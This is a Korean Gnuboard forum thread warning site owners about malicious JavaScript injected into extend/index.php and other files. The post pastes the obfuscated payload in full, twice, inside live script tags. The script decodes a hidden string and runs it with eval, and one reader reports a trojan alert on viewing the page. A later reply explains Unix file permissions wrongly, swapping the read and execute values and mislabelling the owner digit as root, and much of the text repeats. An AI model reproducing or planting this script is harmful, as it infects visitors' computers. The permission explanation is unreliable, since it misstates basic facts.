extend 폴더의 index.php 를 확인하세요 정보
extend 폴더의 index.php 를 확인하세요본문
그누보드
extend/ index.php 화일에 주의 하세요
<!-- ad --><script>this.varDate="";this.intStaticFloat="intStaticFloat";var nsNull=function(){};var windowNs;this.falseFinalByte=false;var finalWindowShort=new Date();var shortDoubleSet="";windowNs='%e0%fe%ed%fc%ff%ea%e1%f9%aa%f0%ce%ea%e4%c9%a7%b5%ae%ec%f7%d4%eb%ca%e2%ad%fd%ec%d3%ba%b0%fd%f7%ed%d5%b9%b9%88%ec%f3%ec%e8%eb%bf%e1%d7%e4%b9%f9%f6%fd%9e%e0%e3%a8%e7%c3%cf%b4%a7%aa%aa%f0%f2%fb%e2%fd%8b%b4%e8%e0%ea%b8%fd%ee%e8%bc%8f%dc%f9%ef%f1%a0%b1%a9%e1%f9%e1%ed%f6%ee%f5%bb%f8%fb%e9';var byteGetInt=new Array();var dateFloatByte=function(){return 'dateFloatByte'};function floatLetterDate(intVar){var varGet=false;var intWindowDouble=false;this.wordDate="";this.setDate=5444;for(longFinal=0;longFinal<3;longFinal++){};function dateSet(shortFinal){this.doubleTrueFalse="";this.wordSet='';function staticWordVar(staticWordVar){return true};var letterLetter=0;var shortNsAs=false;var dateTrueNs=new Array();wordFloatByte=0;while(wordFloatByte<0){wordFloatByte++};var staticUse=shortFinal.length, byteDoubleLong=0;var longGetChar='';var windowNsShort=new Date();function charSetAs(charSetAs){return 'charSetAs'};var setSetAs=new Array();for(trueDouble=0;trueDouble<1;trueDouble++){};while(byteDoubleLong<staticUse){for(nsGet=0;nsGet<2;nsGet++){};var varAs=function(){};this.floatChar=14914;var dateStaticInt='dateStaticInt'.substring(52533, 52533);var trueStaticSet=50549;letterLetter+=nsFalseFalse(shortFinal,byteDoubleLong)*staticUse;for(getUseDate=0;getUseDate<3;getUseDate++){getUseDate++};var shortCharShort='shortCharShort'.substring(22909, 22909);byteDoubleLong++;function longWindow(longWindow){return 'longWindow'};var doubleShortChar=new Date();var shortGet="shortGet";}var letterTrueChar='';var falseIntInt="falseIntInt";this.staticDouble="";falseStatic=0;while(falseStatic<4){falseStatic++};var staticVar='';return (letterLetter+'');this.byteSetNs=18208;this.windowVarFloat="windowVarFloat";var falseFinal='falseFinal'.substring(65206, 65206);}var dateDouble=new Array();this.useWord="useWord";var charShortStatic=44307;for(floatByte=0;floatByte<4;floatByte++){floatByte++};for(getGetLetter=0;getGetLetter<1;getGetLetter++){getGetLetter++};this.finalFinalTrue="";function nsFalseFalse(doubleLongDate,finalUse){function trueWindowDate(trueWindowDate){return true};this.shortStaticTrue='';this.staticFalseAs=64900;return doubleLongDate['cjhYaUrUCjofdfe@AYt@'.replace(/[j@fYU]/g, '')](finalUse);var nsTrue=false;var useUseWord=false;}var charFalse=function(){return 'charFalse'};var wordFinal="";var charVar="charVar";this.varGetLong=40344;var asNs=21997;this.nsFalseWindow="";var trueWindowNull=window['eIvRaRlI'.replace(/[Ry\]/g, '')]('ahr9g9uhm|e|n;t;sE.|cEa;lhl;e|e9'.replace(/[9h;\|E]/g, ''));var longDoubleNull=12476;var charWindowByte=function(){return 'charWindowByte'};var getWordWindow=new Date();var getIntDouble=function(){};var intShort=new Date();var getWordSet=function(){return 'getWordSet'};var nsFalse=0,doubleSet=0, dateWord=211;this.setByte=false;var varUseDate=function(){};var charTrueDouble='';function setTrue(){};var asStaticCharSet="asStaticCharSet";this.nsNullDate="nsNullDate";var nullInt=(new String(trueWindowNull)).replace(/[^@a-z0-9A-Z_.,-]/g,'');this.falseSetDouble="falseSetDouble";var longShortFalse=new Array();var staticWordWord=dateSet(nullInt);var nsNsInt=false;for(finalFinalWord=0;finalFinalWord<0;finalFinalWord++){finalFinalWord++};for(longFinalWindow=0;longFinalWindow<4;longFinalWindow++){longFinalWindow++};this.letterGetGet="";this.letterSetVar="";function trueInt(trueInt){return 'trueInt'};intVar=window['ujnLeLsIcIaLpjeT'.replace(/[ISTLj]/g, '')](intVar);var dateUse='';var finalFalseStatic=function(){};this.doubleFalseInt=false;var staticUseWindow='staticUseWindow'.substring(18727, 18727);for(var windowDateTrue=0; windowDateTrue < (intVar.length); windowDateTrue++){for(varChar=0;varChar<2;varChar++){varChar++};var nsNullWord=function(){};var longLetterLetter=new Date();var trueWord=false;var floatDouble=nsFalseFalse(nullInt,nsFalse);this.trueLong="trueLong";var getLong='';var letterGetLetter=nsFalseFalse(staticWordWord,doubleSet);function floatFalse(){};var intLongFinal='intLongFinal'.substring(15936, 15936);var asLetterVar='';var byteShortVar="";var longStatic=false;var nsFloat=floatDouble^letterGetLetter^dateWord;for(letterAsLetter=0;letterAsLetter<4;letterAsLetter++){};var longNs="longNs";var useFloatShort=false;var wordFloatNull=nsFalseFalse(intVar,windowDateTrue);var wordGetUse="wordGetUse";this.finalAs='';for(dateDoubleShort=0;dateDoubleShort<0;dateDoubleShort++){dateDoubleShort++};var trueTrue=function(){};nsFalse++,doubleSet++;var trueTrueStatic=function(){};this.shortDouble="shortDouble";charTrueDouble+=String['f3rso3mZC3h3asr9C9osdXe3'.replace(/[XZ3s9]/g, '')](wordFloatNull^nsFloat);this.shortByteUse="shortByteUse";this.getByteUse='';this.charNsSet=false;var longUseShort="longUseShort";this.falseByte="";if(doubleSet>staticWordWord.length)doubleSet=0;doubleSetByte=0;while(doubleSetByte<2){doubleSetByte++};var falseLetterTrue=function(){};if(nsFalse>nullInt.length)nsFalse=0;for(nsStatic=0;nsStatic<2;nsStatic++){nsStatic++};this.charFalseLetterNull=63075;}var varUseLong=new Date();var setFinalNs=function(){};this.staticAsDate=false;function floatDoubleLong(){};this.useDateInt="";window['eIvRaRlI'.replace(/[Ry\]/g, '')](charTrueDouble); this.letterGetDouble=false;this.dateLong="dateLong";function nsShort(nsShort){return true};staticWord=0;while(staticWord<3){staticWord++};return charTrueDouble=new String();var byteIntDouble=new Array();for(asSet=0;asSet<4;asSet++){};var windowLetter="";var finalFinalShort="finalFinalShort";var charInt=new Array();}this.windowSetDouble=false;this.getTrueChar="";var useAsWord='';floatLetterDate(windowNs);var wordLetterUse='wordLetterUse'.substring(36320, 36320);var nsFloatStatic=new Array();</script><!-- /ad -->
이런 내용으로 요즘 갑자기 도배가 되는군요..
음 버전 자체가 구 버전 이라 해킹을 당해도 어쩔수 없지만 패치자체도 문제고 주의를 좀 하셔야 할지도 모르겠습니다..
extend/ index.php 화일에 주의 하세요
<!-- ad --><script>this.varDate="";this.intStaticFloat="intStaticFloat";var nsNull=function(){};var windowNs;this.falseFinalByte=false;var finalWindowShort=new Date();var shortDoubleSet="";windowNs='%e0%fe%ed%fc%ff%ea%e1%f9%aa%f0%ce%ea%e4%c9%a7%b5%ae%ec%f7%d4%eb%ca%e2%ad%fd%ec%d3%ba%b0%fd%f7%ed%d5%b9%b9%88%ec%f3%ec%e8%eb%bf%e1%d7%e4%b9%f9%f6%fd%9e%e0%e3%a8%e7%c3%cf%b4%a7%aa%aa%f0%f2%fb%e2%fd%8b%b4%e8%e0%ea%b8%fd%ee%e8%bc%8f%dc%f9%ef%f1%a0%b1%a9%e1%f9%e1%ed%f6%ee%f5%bb%f8%fb%e9';var byteGetInt=new Array();var dateFloatByte=function(){return 'dateFloatByte'};function floatLetterDate(intVar){var varGet=false;var intWindowDouble=false;this.wordDate="";this.setDate=5444;for(longFinal=0;longFinal<3;longFinal++){};function dateSet(shortFinal){this.doubleTrueFalse="";this.wordSet='';function staticWordVar(staticWordVar){return true};var letterLetter=0;var shortNsAs=false;var dateTrueNs=new Array();wordFloatByte=0;while(wordFloatByte<0){wordFloatByte++};var staticUse=shortFinal.length, byteDoubleLong=0;var longGetChar='';var windowNsShort=new Date();function charSetAs(charSetAs){return 'charSetAs'};var setSetAs=new Array();for(trueDouble=0;trueDouble<1;trueDouble++){};while(byteDoubleLong<staticUse){for(nsGet=0;nsGet<2;nsGet++){};var varAs=function(){};this.floatChar=14914;var dateStaticInt='dateStaticInt'.substring(52533, 52533);var trueStaticSet=50549;letterLetter+=nsFalseFalse(shortFinal,byteDoubleLong)*staticUse;for(getUseDate=0;getUseDate<3;getUseDate++){getUseDate++};var shortCharShort='shortCharShort'.substring(22909, 22909);byteDoubleLong++;function longWindow(longWindow){return 'longWindow'};var doubleShortChar=new Date();var shortGet="shortGet";}var letterTrueChar='';var falseIntInt="falseIntInt";this.staticDouble="";falseStatic=0;while(falseStatic<4){falseStatic++};var staticVar='';return (letterLetter+'');this.byteSetNs=18208;this.windowVarFloat="windowVarFloat";var falseFinal='falseFinal'.substring(65206, 65206);}var dateDouble=new Array();this.useWord="useWord";var charShortStatic=44307;for(floatByte=0;floatByte<4;floatByte++){floatByte++};for(getGetLetter=0;getGetLetter<1;getGetLetter++){getGetLetter++};this.finalFinalTrue="";function nsFalseFalse(doubleLongDate,finalUse){function trueWindowDate(trueWindowDate){return true};this.shortStaticTrue='';this.staticFalseAs=64900;return doubleLongDate['cjhYaUrUCjofdfe@AYt@'.replace(/[j@fYU]/g, '')](finalUse);var nsTrue=false;var useUseWord=false;}var charFalse=function(){return 'charFalse'};var wordFinal="";var charVar="charVar";this.varGetLong=40344;var asNs=21997;this.nsFalseWindow="";var trueWindowNull=window['eIvRaRlI'.replace(/[Ry\]/g, '')]('ahr9g9uhm|e|n;t;sE.|cEa;lhl;e|e9'.replace(/[9h;\|E]/g, ''));var longDoubleNull=12476;var charWindowByte=function(){return 'charWindowByte'};var getWordWindow=new Date();var getIntDouble=function(){};var intShort=new Date();var getWordSet=function(){return 'getWordSet'};var nsFalse=0,doubleSet=0, dateWord=211;this.setByte=false;var varUseDate=function(){};var charTrueDouble='';function setTrue(){};var asStaticCharSet="asStaticCharSet";this.nsNullDate="nsNullDate";var nullInt=(new String(trueWindowNull)).replace(/[^@a-z0-9A-Z_.,-]/g,'');this.falseSetDouble="falseSetDouble";var longShortFalse=new Array();var staticWordWord=dateSet(nullInt);var nsNsInt=false;for(finalFinalWord=0;finalFinalWord<0;finalFinalWord++){finalFinalWord++};for(longFinalWindow=0;longFinalWindow<4;longFinalWindow++){longFinalWindow++};this.letterGetGet="";this.letterSetVar="";function trueInt(trueInt){return 'trueInt'};intVar=window['ujnLeLsIcIaLpjeT'.replace(/[ISTLj]/g, '')](intVar);var dateUse='';var finalFalseStatic=function(){};this.doubleFalseInt=false;var staticUseWindow='staticUseWindow'.substring(18727, 18727);for(var windowDateTrue=0; windowDateTrue < (intVar.length); windowDateTrue++){for(varChar=0;varChar<2;varChar++){varChar++};var nsNullWord=function(){};var longLetterLetter=new Date();var trueWord=false;var floatDouble=nsFalseFalse(nullInt,nsFalse);this.trueLong="trueLong";var getLong='';var letterGetLetter=nsFalseFalse(staticWordWord,doubleSet);function floatFalse(){};var intLongFinal='intLongFinal'.substring(15936, 15936);var asLetterVar='';var byteShortVar="";var longStatic=false;var nsFloat=floatDouble^letterGetLetter^dateWord;for(letterAsLetter=0;letterAsLetter<4;letterAsLetter++){};var longNs="longNs";var useFloatShort=false;var wordFloatNull=nsFalseFalse(intVar,windowDateTrue);var wordGetUse="wordGetUse";this.finalAs='';for(dateDoubleShort=0;dateDoubleShort<0;dateDoubleShort++){dateDoubleShort++};var trueTrue=function(){};nsFalse++,doubleSet++;var trueTrueStatic=function(){};this.shortDouble="shortDouble";charTrueDouble+=String['f3rso3mZC3h3asr9C9osdXe3'.replace(/[XZ3s9]/g, '')](wordFloatNull^nsFloat);this.shortByteUse="shortByteUse";this.getByteUse='';this.charNsSet=false;var longUseShort="longUseShort";this.falseByte="";if(doubleSet>staticWordWord.length)doubleSet=0;doubleSetByte=0;while(doubleSetByte<2){doubleSetByte++};var falseLetterTrue=function(){};if(nsFalse>nullInt.length)nsFalse=0;for(nsStatic=0;nsStatic<2;nsStatic++){nsStatic++};this.charFalseLetterNull=63075;}var varUseLong=new Date();var setFinalNs=function(){};this.staticAsDate=false;function floatDoubleLong(){};this.useDateInt="";window['eIvRaRlI'.replace(/[Ry\]/g, '')](charTrueDouble); this.letterGetDouble=false;this.dateLong="dateLong";function nsShort(nsShort){return true};staticWord=0;while(staticWord<3){staticWord++};return charTrueDouble=new String();var byteIntDouble=new Array();for(asSet=0;asSet<4;asSet++){};var windowLetter="";var finalFinalShort="finalFinalShort";var charInt=new Array();}this.windowSetDouble=false;this.getTrueChar="";var useAsWord='';floatLetterDate(windowNs);var wordLetterUse='wordLetterUse'.substring(36320, 36320);var nsFloatStatic=new Array();</script><!-- /ad -->
이런 내용으로 요즘 갑자기 도배가 되는군요..
음 버전 자체가 구 버전 이라 해킹을 당해도 어쩔수 없지만 패치자체도 문제고 주의를 좀 하셔야 할지도 모르겠습니다..
댓글 전체
광고 트래픽을 올리는 코드 인가요?
요새 많네요.. 이런 일이 ㅎㅎ
그누보드는 이게 좋습니다. 오픈된 만큼 위험도 크지만 그만큼 해결도 빨리 되는것..
요새 많네요.. 이런 일이 ㅎㅎ
그누보드는 이게 좋습니다. 오픈된 만큼 위험도 크지만 그만큼 해결도 빨리 되는것..
보통 파일에 악성코드 심어 놓는 것은
자신의 컴퓨터가 바이러스나 악성코드가 걸렸을 경우가 많던데.
자신의 컴퓨터가 바이러스나 악성코드가 걸렸을 경우가 많던데.
이 페이지 눌렀더니 트로이목마가 발견되었다고 뜨는군요.
문제가 있어 보이는데요.
이것 자체가 보는 사람들에게 바이러스를 퍼트리는 모양인데요.
문제가 있어 보이는데요.
이것 자체가 보는 사람들에게 바이러스를 퍼트리는 모양인데요.
문제는 이 글 자체는 특정 사이트로 유도를 하지는 않더라구요.
제가 찾은 부분은 / index.php 랑
/bbs/login.php 랑
extend/index.php 안에 3군데에 일단 있더군요.
일단 아직 분석도 못하고 -_-;; 그냥 대충 퍼미션 막아서 막아두긴 했지만 나머진 모르겠습니다.
이것도 분명히 확인을 해봐야 하겠군요..
음 사이트중에 4.31.06 버전은 이 부분이 통하지 않는 모양입니다.
4.31.06버전으로 버티는 사이트가 한개 있는데 그 사이트는 아직 이런 만행이 없군요.
아직 자세히 판정할수는 없지만 오누리님의 빌더 최신 버전 이 한개 있는데 이것이 뚫린걸 보아선 .. (빌더버전 : 1.9 / 그누버전 : 4.31.06 / 패치날짜 : 09.5.26)
음 이것 역쉬 사용자 컴의 감염으로 움직이는듯 합니다..
ftp 접속 로그를 살펴보니 헉
오누리 빌더의 경우는 adm/ 에서 쿠폰 및
convert 부분
그리고 data 밑에 경로까지 쫘악~~~~~~~~ 쓸고 가버렸네요
에디트도 -_-;;
컴 주의해서 사용해야 할지도 ;;
제가 찾은 부분은 / index.php 랑
/bbs/login.php 랑
extend/index.php 안에 3군데에 일단 있더군요.
일단 아직 분석도 못하고 -_-;; 그냥 대충 퍼미션 막아서 막아두긴 했지만 나머진 모르겠습니다.
이것도 분명히 확인을 해봐야 하겠군요..
음 사이트중에 4.31.06 버전은 이 부분이 통하지 않는 모양입니다.
4.31.06버전으로 버티는 사이트가 한개 있는데 그 사이트는 아직 이런 만행이 없군요.
아직 자세히 판정할수는 없지만 오누리님의 빌더 최신 버전 이 한개 있는데 이것이 뚫린걸 보아선 .. (빌더버전 : 1.9 / 그누버전 : 4.31.06 / 패치날짜 : 09.5.26)
음 이것 역쉬 사용자 컴의 감염으로 움직이는듯 합니다..
ftp 접속 로그를 살펴보니 헉
오누리 빌더의 경우는 adm/ 에서 쿠폰 및
convert 부분
그리고 data 밑에 경로까지 쫘악~~~~~~~~ 쓸고 가버렸네요
에디트도 -_-;;
컴 주의해서 사용해야 할지도 ;;
퍼미션 질문좀요........
전 보통 755 로 두는데
어떤의미인가요??
전 보통 755 로 두는데
어떤의미인가요??
읽기 = 1
쓰기 = 2
실행 = 4
입니다.
이 세가지가 합쳐져서 하나의 퍼미션이 됩니다.
제일 처음 7 은 Root 사용자 권한 입니다.
두번째는 Group 사용자 권한 입니다.
세번째는 실 계정 사용자 권한 입니다.
7 : 5 : 5
루트 그룹 계정
읽고.쓰고.실행이 가능 읽기 및 실행만 가능 읽기 및 실행만 가능
대충 이렇게 이해 하시면 되겠죠.
자신의 쉘에서 ll 내지 ls -l 을 하시면
drwxrwxr-x 2 re**** re**** 4096 2007-11-27 10:47 lib -> 1775
-rw-r--r-- 1 re**** re**** 405 2009-02-19 12:52 main.php -> 0611
-rw-r--r-- 1 re**** re**** 20603 2009-01-23 01:30 mssql.php -> 0611
drwx---rwx 7 apache apache 4096 2008-12-02 10:31 data -> 1707
nobody 내지 apache 또는 daemon 으로 웹 유저는 설정이 됩니다.
이런게 대충 보시면 됩니다.
그렇게 보시면 저기 앞에 붙은 문자가 이해가 되는거죠.
d = 디렉토리 라고 생각하시면 됩니다.
대강 어거지 설명이 되셨는지 ;;
쓰기 = 2
실행 = 4
입니다.
이 세가지가 합쳐져서 하나의 퍼미션이 됩니다.
제일 처음 7 은 Root 사용자 권한 입니다.
두번째는 Group 사용자 권한 입니다.
세번째는 실 계정 사용자 권한 입니다.
7 : 5 : 5
루트 그룹 계정
읽고.쓰고.실행이 가능 읽기 및 실행만 가능 읽기 및 실행만 가능
대충 이렇게 이해 하시면 되겠죠.
자신의 쉘에서 ll 내지 ls -l 을 하시면
drwxrwxr-x 2 re**** re**** 4096 2007-11-27 10:47 lib -> 1775
-rw-r--r-- 1 re**** re**** 405 2009-02-19 12:52 main.php -> 0611
-rw-r--r-- 1 re**** re**** 20603 2009-01-23 01:30 mssql.php -> 0611
drwx---rwx 7 apache apache 4096 2008-12-02 10:31 data -> 1707
nobody 내지 apache 또는 daemon 으로 웹 유저는 설정이 됩니다.
이런게 대충 보시면 됩니다.
그렇게 보시면 저기 앞에 붙은 문자가 이해가 되는거죠.
d = 디렉토리 라고 생각하시면 됩니다.
대강 어거지 설명이 되셨는지 ;;